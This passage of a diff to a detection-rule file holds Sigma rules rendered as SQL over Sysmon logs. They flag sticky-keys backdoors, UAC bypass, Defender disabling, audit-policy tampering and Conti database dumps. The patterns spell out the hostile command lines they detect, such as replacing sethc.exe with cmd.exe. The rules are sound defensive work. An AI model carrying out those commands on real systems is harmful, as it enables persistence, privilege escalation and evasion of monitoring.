suspicious diagcab files with embedded answer files leveraging CVE-2022-30190", + "author": "Nasreddine Bencherchali (Nextron Systems), GossiTheDog, frack113", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.defense_evasion", + "attack.t1202" ], "falsepositives": [ - "Legitimate MSSQL Server actions" + "Legitimate usage of \".diagcab\" files" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\sqldumper.exe' ESCAPE '\\' AND (CommandLine LIKE '%0x0110%' ESCAPE '\\' OR CommandLine LIKE '%0x01100:40%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\msdt.exe' ESCAPE '\\' OR OriginalFileName = 'msdt.exe') AND (CommandLine LIKE '% /cab %' ESCAPE '\\' OR CommandLine LIKE '% -cab %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_susp_sqldumper_activity.yml" + "filename": "proc_creation_win_msdt_susp_cab_options.yml" }, { - "title": "PUA - Chisel Tunneling Tool Execution", - "id": "8b0e12da-d3c3-49db-bb4f-256703f380e5", + "title": "Persistence Via Sticky Key Backdoor", + "id": "1070db9a-3e5d-412e-8e7b-7183b616e1b3", "status": "experimental", - "description": "Detects usage of the Chisel tunneling tool via the commandline arguments", - "author": "Florian Roth (Nextron Systems)", + "description": "By replacing the sticky keys executable with the local admins CMD executable, an attacker is able to access a privileged windows console session without authenticating to the system.\nWhen the sticky keys are \"activated\" the privilleged shell is launched.\n", + "author": "Sreeman", "tags": [ - "attack.command_and_control", - "attack.t1090.001" + "attack.t1546.008", + "attack.privilege_escalation" ], "falsepositives": [ - "Some false positives may occur with other tools with similar commandlines" + "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\chisel.exe' ESCAPE '\\' OR ((CommandLine LIKE '%exe client %' ESCAPE '\\' OR CommandLine LIKE '%exe server %' ESCAPE '\\') AND (CommandLine LIKE '%-socks5%' ESCAPE '\\' OR CommandLine LIKE '%-reverse%' ESCAPE '\\' OR CommandLine LIKE '% r:%' ESCAPE '\\' OR CommandLine LIKE '%:127.0.0.1:%' ESCAPE '\\' OR CommandLine LIKE '%-tls-skip-verify %' ESCAPE '\\' OR CommandLine LIKE '%:socks%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%copy %' ESCAPE '\\' AND CommandLine LIKE '%/y %' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\windows\\\\system32\\\\cmd.exe C:\\\\windows\\\\system32\\\\sethc.exe%' ESCAPE '\\')" ], - "filename": "proc_creation_win_pua_chisel.yml" + "filename": "proc_creation_win_cmd_sticky_keys_replace.yml" }, { - "title": "Suspicious Msiexec Execute Arbitrary DLL", - "id": "6f4191bb-912b-48a8-9ce7-682769541e6d", - "status": "experimental", - "description": "Adversaries may abuse msiexec.exe to proxy execution of malicious payloads.\nMsiexec.exe is the command-line utility for the Windows Installer and is thus commonly associated with executing installation packages (.msi)\n", - "author": "frack113", + "title": "Suspicious Compression Tool Parameters", + "id": "27a72a60-7e5e-47b1-9d17-909c9abafdcd", + "status": "test", + "description": "Detects suspicious command line arguments of common data compression tools", + "author": "Florian Roth (Nextron Systems), Samir Bousseaden", "tags": [ - "attack.defense_evasion", - "attack.t1218.007" + "attack.collection", + "attack.t1560.001" ], "falsepositives": [ - "Legitimate script" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\msiexec.exe' ESCAPE '\\' AND (CommandLine LIKE '% /y%' ESCAPE '\\' OR CommandLine LIKE '% -y%' ESCAPE '\\')) AND NOT (((CommandLine LIKE '%\\\\MsiExec.exe\" /Y \"C:\\\\Program Files\\\\Bonjour\\\\mdnsNSP.dll%' ESCAPE '\\' OR CommandLine LIKE '%\\\\MsiExec.exe\" /Y \"C:\\\\Program Files (x86)\\\\Bonjour\\\\mdnsNSP.dll%' ESCAPE '\\' OR CommandLine LIKE '%\\\\MsiExec.exe\" /Y \"C:\\\\Program Files (x86)\\\\Apple Software Update\\\\ScriptingObjectModel.dll%' ESCAPE '\\' OR CommandLine LIKE '%\\\\MsiExec.exe\" /Y \"C:\\\\Program Files (x86)\\\\Apple Software Update\\\\SoftwareUpdateAdmin.dll%' ESCAPE '\\' OR CommandLine LIKE '%\\\\MsiExec.exe\" /Y \"C:\\\\Windows\\\\CCM\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\MsiExec.exe\" /Y C:\\\\Windows\\\\CCM\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\MsiExec.exe\" -Y \"C:\\\\Program Files\\\\Bonjour\\\\mdnsNSP.dll%' ESCAPE '\\' OR CommandLine LIKE '%\\\\MsiExec.exe\" -Y \"C:\\\\Program Files (x86)\\\\Bonjour\\\\mdnsNSP.dll%' ESCAPE '\\' OR CommandLine LIKE '%\\\\MsiExec.exe\" -Y \"C:\\\\Program Files (x86)\\\\Apple Software Update\\\\ScriptingObjectModel.dll%' ESCAPE '\\' OR CommandLine LIKE '%\\\\MsiExec.exe\" -Y \"C:\\\\Program Files (x86)\\\\Apple Software Update\\\\SoftwareUpdateAdmin.dll%' ESCAPE '\\' OR CommandLine LIKE '%\\\\MsiExec.exe\" -Y \"C:\\\\Windows\\\\CCM\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\MsiExec.exe\" -Y C:\\\\Windows\\\\CCM\\\\%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((OriginalFileName LIKE '7z%.exe' ESCAPE '\\' OR OriginalFileName LIKE '%rar.exe' ESCAPE '\\' OR OriginalFileName LIKE '%Command%Line%RAR%' ESCAPE '\\') AND (CommandLine LIKE '% -p%' ESCAPE '\\' OR CommandLine LIKE '% -ta%' ESCAPE '\\' OR CommandLine LIKE '% -tb%' ESCAPE '\\' OR CommandLine LIKE '% -sdel%' ESCAPE '\\' OR CommandLine LIKE '% -dw%' ESCAPE '\\' OR CommandLine LIKE '% -hp%' ESCAPE '\\')) AND NOT (ParentImage LIKE 'C:\\\\Program%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_msiexec_execute_dll.yml" + "filename": "proc_creation_win_susp_compression_params.yml" }, { - "title": "File Download Via Curl.EXE", - "id": "9a517fca-4ba3-4629-9278-a68694697b81", - "status": "experimental", - "description": "Detects file download using curl.exe", + "title": "Potential MsiExec Masquerading", + "id": "e22a6eb2-f8a5-44b5-8b44-a2dbd47b1144", + "status": "test", + "description": "Detects the execution of msiexec.exe from an uncommon directory", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1105" + "attack.defense_evasion", + "attack.t1036.005" ], "falsepositives": [ - "Scripts created by developers and admins", - "Administrative activity", - "The \"\\Git\\usr\\bin\\sh.exe\" process uses the \"--output\" flag to download a specific file in the temp directory with the pattern \"gfw-httpget-xxxxxxxx.txt \"" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\curl.exe' ESCAPE '\\' OR Product = 'The curl executable') AND (CommandLine LIKE '% -O%' ESCAPE '\\' OR CommandLine LIKE '%--remote-name%' ESCAPE '\\' OR CommandLine LIKE '%--output%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR OriginalFileName LIKE '\\\\msiexec.exe' ESCAPE '\\') AND NOT ((Image LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_curl_download.yml" + "filename": "proc_creation_win_msiexec_masquerading.yml" }, { - "title": "Use of VSIISExeLauncher.exe", - "id": "18749301-f1c5-4efc-a4c3-276ff1f5b6f8", + "title": "Suspicious Regsvr32 Execution From Remote Share", + "id": "88a87a10-384b-4ad7-8871-2f9bf9259ce5", "status": "experimental", - "description": "The \"VSIISExeLauncher.exe\" binary part of the Visual Studio/VS Code can be used to execute arbitrary binaries", + "description": "Detects REGSVR32.exe to execute DLL hosted on remote shares", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1127" + "attack.t1218.010" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\VSIISExeLauncher.exe' ESCAPE '\\' OR OriginalFileName = 'VSIISExeLauncher.exe') AND (CommandLine LIKE '% -p %' ESCAPE '\\' OR CommandLine LIKE '% -a %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR OriginalFileName LIKE '\\\\REGSVR32.EXE' ESCAPE '\\') AND CommandLine LIKE '% \\\\\\\\\\*' ESCAPE '\\')" ], - "filename": "proc_creation_win_lolbin_vsiisexelauncher.yml" + "filename": "proc_creation_win_regsvr32_remote_share.yml" }, { - "title": "ConvertTo-SecureString Cmdlet Usage Via CommandLine", - "id": "74403157-20f5-415d-89a7-c505779585cf", + "title": "Bypass UAC via WSReset.exe", + "id": "d797268e-28a9-49a7-b9a8-2f5039011c5c", "status": "test", - "description": "Detects usage of the \"ConvertTo-SecureString\" cmdlet via the commandline. Which is fairly uncommon and could indicate potential suspicious activity", - "author": "Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton", + "description": "Detects use of WSReset.exe to bypass User Account Control (UAC). Adversaries use this technique to execute privileged processes.", + "author": "E.M. Anhaus (originally from Atomic Blue Detections, Tony Lambert), oscd.community, Florian Roth", "tags": [ + "attack.privilege_escalation", "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.t1548.002" ], "falsepositives": [ - "Legitimate use to pass password to different powershell commands" + "Unknown sub processes of Wsreset.exe" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND CommandLine LIKE '%ConvertTo-SecureString%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ParentImage LIKE '%\\\\wsreset.exe' ESCAPE '\\' AND NOT (Image LIKE '%\\\\conhost.exe' ESCAPE '\\' OR OriginalFileName = 'CONHOST.EXE'))" ], - "filename": "proc_creation_win_powershell_cmdline_convertto_securestring.yml" + "filename": "proc_creation_win_uac_bypass_wsreset.yml" }, { - "title": "Potential PlugX Activity", - "id": "aeab5ec5-be14-471a-80e8-e344418305c2", + "title": "DumpStack.log Defender Evasion", + "id": "4f647cfa-b598-4e12-ad69-c68dd16caef8", "status": "test", - "description": "Detects the execution of an executable that is typically used by PlugX for DLL side loading starting from an uncommon location", + "description": "Detects the use of the filename DumpStack.log to evade Microsoft Defender", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.s0013", - "attack.defense_evasion", - "attack.t1574.002" + "attack.defense_evasion" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((((((((((((Image LIKE '%\\\\CamMute.exe' ESCAPE '\\' AND NOT ((Image LIKE '%\\\\Lenovo\\\\Communication Utility\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Lenovo\\\\Communications Utility\\\\%' ESCAPE '\\'))) OR (Image LIKE '%\\\\chrome\\_frame\\_helper.exe' ESCAPE '\\' AND NOT (Image LIKE '%\\\\Google\\\\Chrome\\\\application\\\\%' ESCAPE '\\'))) OR (Image LIKE '%\\\\dvcemumanager.exe' ESCAPE '\\' AND NOT (Image LIKE '%\\\\Microsoft Device Emulator\\\\%' ESCAPE '\\'))) OR (Image LIKE '%\\\\Gadget.exe' ESCAPE '\\' AND NOT (Image LIKE '%\\\\Windows Media Player\\\\%' ESCAPE '\\'))) OR (Image LIKE '%\\\\hcc.exe' ESCAPE '\\' AND NOT (Image LIKE '%\\\\HTML Help Workshop\\\\%' ESCAPE '\\'))) OR (Image LIKE '%\\\\hkcmd.exe' ESCAPE '\\' AND NOT ((Image LIKE '%\\\\System32\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\SysNative\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\SysWow64\\\\%' ESCAPE '\\')))) OR (Image LIKE '%\\\\Mc.exe' ESCAPE '\\' AND NOT ((Image LIKE '%\\\\Microsoft Visual Studio%' ESCAPE '\\' OR Image LIKE '%\\\\Microsoft SDK%' ESCAPE '\\' OR Image LIKE '%\\\\Windows Kit%' ESCAPE '\\')))) OR (Image LIKE '%\\\\MsMpEng.exe' ESCAPE '\\' AND NOT ((Image LIKE '%\\\\Microsoft Security Client\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Windows Defender\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\AntiMalware\\\\%' ESCAPE '\\')))) OR (Image LIKE '%\\\\msseces.exe' ESCAPE '\\' AND NOT ((Image LIKE '%\\\\Microsoft Security Center\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Microsoft Security Client\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Microsoft Security Essentials\\\\%' ESCAPE '\\')))) OR (Image LIKE '%\\\\OInfoP11.exe' ESCAPE '\\' AND NOT (Image LIKE '%\\\\Common Files\\\\Microsoft Shared\\\\%' ESCAPE '\\'))) OR (Image LIKE '%\\\\OleView.exe' ESCAPE '\\' AND NOT ((Image LIKE '%\\\\Microsoft Visual Studio%' ESCAPE '\\' OR Image LIKE '%\\\\Microsoft SDK%' ESCAPE '\\' OR Image LIKE '%\\\\Windows Kit%' ESCAPE '\\' OR Image LIKE '%\\\\Windows Resource Kit\\\\%' ESCAPE '\\')))) OR (Image LIKE '%\\\\rc.exe' ESCAPE '\\' AND NOT ((Image LIKE '%\\\\Microsoft Visual Studio%' ESCAPE '\\' OR Image LIKE '%\\\\Microsoft SDK%' ESCAPE '\\' OR Image LIKE '%\\\\Windows Kit%' ESCAPE '\\' OR Image LIKE '%\\\\Windows Resource Kit\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Microsoft.NET\\\\%' ESCAPE '\\')))))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\DumpStack.log' ESCAPE '\\' OR CommandLine LIKE '% -o DumpStack.log%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_malware_plugx_susp_exe_locations.yml" + "filename": "proc_creation_win_susp_dumpstack_log_evasion.yml" }, { - "title": "Tasks Folder Evasion", - "id": "cc4e02ba-9c06-48e2-b09e-2500cace9ae0", + "title": "New Port Forwarding Rule Added Via Netsh.EXX", + "id": "322ed9ec-fcab-4f67-9a34-e7c6aef43614", "status": "test", - "description": "The Tasks folder in system32 and syswow64 are globally writable paths.\nAdversaries can take advantage of this and load or influence any script hosts or ANY .NET Application \nin Tasks to load and execute a custom assembly into cscript, wscript, regsvr32, mshta, eventvwr\n", - "author": "Sreeman", + "description": "Detects the execution of netsh commands that configure a new port forwarding (PortProxy) rule", + "author": "Florian Roth (Nextron Systems), omkar72, oscd.community, Swachchhanda Shrawan Poudel", "tags": [ + "attack.lateral_movement", "attack.defense_evasion", - "attack.persistence", - "attack.execution", - "attack.t1574.002" + "attack.command_and_control", + "attack.t1090" ], "falsepositives": [ - "Unknown" + "Legitimate administration activity", + "WSL2 network bridge PowerShell script used for WSL/Kubernetes/Docker (e.g. https://github.com/microsoft/WSL/issues/4150#issuecomment-504209723)" + ], + "level": "medium", + "rule": [ + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\netsh.exe' ESCAPE '\\' OR OriginalFileName = 'netsh.exe') AND ((CommandLine LIKE '%interface%' ESCAPE '\\' AND CommandLine LIKE '%portproxy%' ESCAPE '\\' AND CommandLine LIKE '%add%' ESCAPE '\\' AND CommandLine LIKE '%v4tov4%' ESCAPE '\\') OR (CommandLine LIKE '%i %' ESCAPE '\\' AND CommandLine LIKE '%p %' ESCAPE '\\' AND CommandLine LIKE '%a %' ESCAPE '\\' AND CommandLine LIKE '%v %' ESCAPE '\\') OR (CommandLine LIKE '%connectp%' ESCAPE '\\' AND CommandLine LIKE '%listena%' ESCAPE '\\' AND CommandLine LIKE '%c=%' ESCAPE '\\')))" + ], + "filename": "proc_creation_win_netsh_port_forwarding.yml" + }, + { + "title": "Audit Policy Tampering Via Auditpol", + "id": "0a13e132-651d-11eb-ae93-0242ac130002", + "status": "test", + "description": "Threat actors can use auditpol binary to change audit policy configuration to impair detection capability.\nThis can be carried out by selectively disabling/removing certain audit policies as well as restoring a custom policy owned by the threat actor.\n", + "author": "Janantha Marasinghe (https://github.com/blueteam0ps)", + "tags": [ + "attack.defense_evasion", + "attack.t1562.002" + ], + "falsepositives": [ + "Administrator or administrator scripts might leverage the flags mentioned in the detection section. Either way, it should always be monitored" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%echo %' ESCAPE '\\' OR CommandLine LIKE '%copy %' ESCAPE '\\' OR CommandLine LIKE '%type %' ESCAPE '\\' OR CommandLine LIKE '%file createnew%' ESCAPE '\\') AND (CommandLine LIKE '% C:\\\\Windows\\\\System32\\\\Tasks\\\\%' ESCAPE '\\' OR CommandLine LIKE '% C:\\\\Windows\\\\SysWow64\\\\Tasks\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\auditpol.exe' ESCAPE '\\' OR OriginalFileName = 'AUDITPOL.EXE') AND (CommandLine LIKE '%disable%' ESCAPE '\\' OR CommandLine LIKE '%clear%' ESCAPE '\\' OR CommandLine LIKE '%remove%' ESCAPE '\\' OR CommandLine LIKE '%restore%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_task_folder_evasion.yml" + "filename": "proc_creation_win_auditpol_susp_execution.yml" }, { - "title": "Sofacy Trojan Loader Activity", - "id": "ba778144-5e3d-40cf-8af9-e28fb1df1e20", + "title": "Potential Commandline Obfuscation Using Escape Characters", + "id": "f0cdd048-82dc-4f7a-8a7a-b87a52b6d0fd", "status": "test", - "description": "Detects Trojan loader activity as used by APT28", - "author": "Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community", + "description": "Detects potential commandline obfuscation using known escape characters", + "author": "juju4", "tags": [ - "attack.g0007", - "attack.execution", - "attack.t1059.003", "attack.defense_evasion", - "car.2013-10-002", - "attack.t1218.011" + "attack.t1140" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%rundll32.exe%' ESCAPE '\\' AND CommandLine LIKE '%\\%APPDATA\\%\\\\%' ESCAPE '\\') AND (CommandLine LIKE '%.dat\",%' ESCAPE '\\' OR (CommandLine LIKE '%.dll\",#1' ESCAPE '\\' OR CommandLine LIKE '%.dll #1' ESCAPE '\\' OR CommandLine LIKE '%.dll\" #1' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%h^t^t^p%' ESCAPE '\\' OR CommandLine LIKE '%h\"t\"t\"p%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_apt_sofacy.yml" + "filename": "proc_creation_win_susp_cli_obfuscation_escape_char.yml" }, { - "title": "Potential Exploitation Attempt Of Undocumented WindowsServer RCE", - "id": "6d5b8176-d87d-4402-8af4-53aee9db7b5d", + "title": "PUA - Nimgrab Execution", + "id": "74a12f18-505c-4114-8d0b-8448dd5485c6", "status": "experimental", - "description": "Detects potential exploitation attempt of undocumented Windows Server Pre Auth Remote Code Execution (RCE)", - "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali", + "description": "Detects the usage of nimgrab, a tool bundled with the Nim programming framework and used for downloading files.", + "author": "frack113", + "tags": [ + "attack.command_and_control", + "attack.t1105" + ], "falsepositives": [ - "Unknown" + "Legitimate use of Nim on a developer systems" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\svchost.exe' ESCAPE '\\' AND Image LIKE '%\\\\svchost.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%-k DHCPServer%' ESCAPE '\\' AND CommandLine LIKE '%-k DHCPServer%' ESCAPE '\\' AND (User LIKE '%NETWORK SERVICE%' ESCAPE '\\' OR User LIKE '%NETZWERKDIENST%' ESCAPE '\\' OR User LIKE '%SERVIZIO DI RETE%' ESCAPE '\\' OR User LIKE '%SERVICIO DE RED%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\nimgrab.exe' ESCAPE '\\' OR (Hashes LIKE '%MD5=2DD44C3C29D667F5C0EF5F9D7C7FFB8B%' ESCAPE '\\' OR Hashes LIKE '%SHA256=F266609E91985F0FE3E31C5E8FAEEEC4FFA5E0322D8B6F15FE69F4C5165B9559%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=C07FDDD21D123EA9B3A08EEF44AAAC45%' ESCAPE '\\') OR md5 = '2DD44C3C29D667F5C0EF5F9D7C7FFB8B' OR sha256 = 'F266609E91985F0FE3E31C5E8FAEEEC4FFA5E0322D8B6F15FE69F4C5165B9559' OR Imphash = 'C07FDDD21D123EA9B3A08EEF44AAAC45'))" ], - "filename": "proc_creation_win_exploit_other_win_server_undocumented_rce.yml" + "filename": "proc_creation_win_pua_nimgrab.yml" }, { - "title": "HackTool - Impersonate Execution", - "id": "cf0c254b-22f1-4b2b-8221-e137b3c0af94", - "status": "experimental", - "description": "Detects execution of the Impersonate tool. Which can be used to manipulate tokens on a Windows computers remotely (PsExec/WmiExec) or interactively", - "author": "Sai Prashanth Pulisetti @pulisettis", + "title": "Suspicious File Download Using Office Application", + "id": "0c79148b-118e-472b-bdb7-9b57b444cc19", + "status": "test", + "description": "Detects the usage of one of three Microsoft office applications (Word, Excel, PowerPoint) to download arbitrary files", + "author": "Beyu Denis, oscd.community", "tags": [ - "attack.privilege_escalation", - "attack.defense_evasion", - "attack.t1134.001", - "attack.t1134.003" + "attack.command_and_control", + "attack.t1105" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%impersonate.exe%' ESCAPE '\\' AND (CommandLine LIKE '% list %' ESCAPE '\\' OR CommandLine LIKE '% exec %' ESCAPE '\\' OR CommandLine LIKE '% adduser %' ESCAPE '\\')) OR ((Hashes LIKE '%MD5=9520714AB576B0ED01D1513691377D01%' ESCAPE '\\' OR Hashes LIKE '%SHA256=E81CC96E2118DC4FBFE5BAD1604E0AC7681960143E2101E1A024D52264BB0A8A%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=0A358FFC1697B7A07D0E817AC740DF62%' ESCAPE '\\') OR md5 = '9520714AB576B0ED01D1513691377D01' OR sha256 = 'E81CC96E2118DC4FBFE5BAD1604E0AC7681960143E2101E1A024D52264BB0A8A' OR Imphash = '0A358FFC1697B7A07D0E817AC740DF62')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR Image LIKE '%\\\\winword.exe' ESCAPE '\\' OR Image LIKE '%\\\\excel.exe' ESCAPE '\\') AND CommandLine LIKE '%http%' ESCAPE '\\')" ], - "filename": "proc_creation_win_hktl_impersonate.yml" + "filename": "proc_creation_win_lolbin_office.yml" }, { - "title": "New ActiveScriptEventConsumer Created Via Wmic.EXE", - "id": "ebef4391-1a81-4761-a40a-1db446c0e625", + "title": "Potential Conti Ransomware Database Dumping Activity", + "id": "2f47f1fd-0901-466e-a770-3b7092834a1b", "status": "test", - "description": "Detects WMIC executions in which an event consumer gets created. This could be used to establish persistence", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects a command used by conti to dump database", + "author": "frack113", "tags": [ - "attack.persistence", - "attack.t1546.003" + "attack.collection", + "attack.t1005" ], "falsepositives": [ - "Legitimate software creating script event consumers" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%ActiveScriptEventConsumer%' ESCAPE '\\' AND CommandLine LIKE '% CREATE %' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\sqlcmd.exe' ESCAPE '\\' OR (CommandLine LIKE '%sqlcmd %' ESCAPE '\\' OR CommandLine LIKE '%sqlcmd.exe%' ESCAPE '\\')) AND CommandLine LIKE '% -S localhost %' ESCAPE '\\' AND (CommandLine LIKE '%sys.sysprocesses%' ESCAPE '\\' OR CommandLine LIKE '%master.dbo.sysdatabases%' ESCAPE '\\' OR CommandLine LIKE '%BACKUP DATABASE%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_wmic_eventconsumer_creation.yml" + "filename": "proc_creation_win_malware_conti_ransomware_database_dump.yml" }, { - "title": "Potential Ke3chang/TidePool Malware Activity", - "id": "7b544661-69fc-419f-9a59-82ccc328f205", - "status": "test", - "description": "Detects registry modifications potentially related to the Ke3chang/TidePool malware as seen in campaigns running in 2019 and 2020", - "author": "Markus Neis, Swisscom", + "title": "Disable Windows Defender AV Security Monitoring", + "id": "a7ee1722-c3c5-aeff-3212-c777e4733217", + "status": "experimental", + "description": "Detects attackers attempting to disable Windows Defender using Powershell", + "author": "ok @securonix invrep-de, oscd.community, frack113", "tags": [ - "attack.g0004", "attack.defense_evasion", "attack.t1562.001" ], "falsepositives": [ - "Unknown" + "Minimal, for some older versions of dev tools, such as pycharm, developers were known to sometimes disable Windows Defender to improve performance, but this generally is not considered a good security practice." ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%-Property DWORD -name DisableFirstRunCustomize -value 2 -Force%' ESCAPE '\\' OR CommandLine LIKE '%-Property String -name Check\\_Associations -value%' ESCAPE '\\' OR CommandLine LIKE '%-Property DWORD -name IEHarden -value 0 -Force%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND (CommandLine LIKE '%-DisableBehaviorMonitoring $true%' ESCAPE '\\' OR CommandLine LIKE '%-DisableRuntimeMonitoring $true%' ESCAPE '\\')) OR ((Image LIKE '%\\\\sc.exe' ESCAPE '\\' OR OriginalFileName = 'sc.exe') AND ((CommandLine LIKE '%stop%' ESCAPE '\\' AND CommandLine LIKE '%WinDefend%' ESCAPE '\\') OR (CommandLine LIKE '%delete%' ESCAPE '\\' AND CommandLine LIKE '%WinDefend%' ESCAPE '\\') OR (CommandLine LIKE '%config%' ESCAPE '\\' AND CommandLine LIKE '%WinDefend%' ESCAPE '\\' AND CommandLine LIKE '%start=disabled%' ESCAPE '\\')))))" + ], + "filename": "proc_creation_win_powershell_disable_defender_av_security_monitoring.yml" + }, + { + "title": "Application Whitelisting Bypass via DLL Loaded by odbcconf.exe", + "id": "65d2be45-8600-4042-b4c0-577a1ff8a60e", + "status": "test", + "description": "Detects defence evasion attempt via odbcconf.exe execution to load DLL", + "author": "Kirill Kiryanov, Beyu Denis, Daniil Yugoslavskiy, oscd.community", + "tags": [ + "attack.defense_evasion", + "attack.t1218.008" + ], + "falsepositives": [ + "Legitimate use of odbcconf.exe by legitimate user" + ], + "level": "medium", + "rule": [ + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Image LIKE '%\\\\odbcconf.exe' ESCAPE '\\' OR OriginalFileName = 'odbcconf.exe') AND (CommandLine LIKE '%-a%' ESCAPE '\\' OR CommandLine LIKE '%-f%' ESCAPE '\\' OR CommandLine LIKE '%/a%' 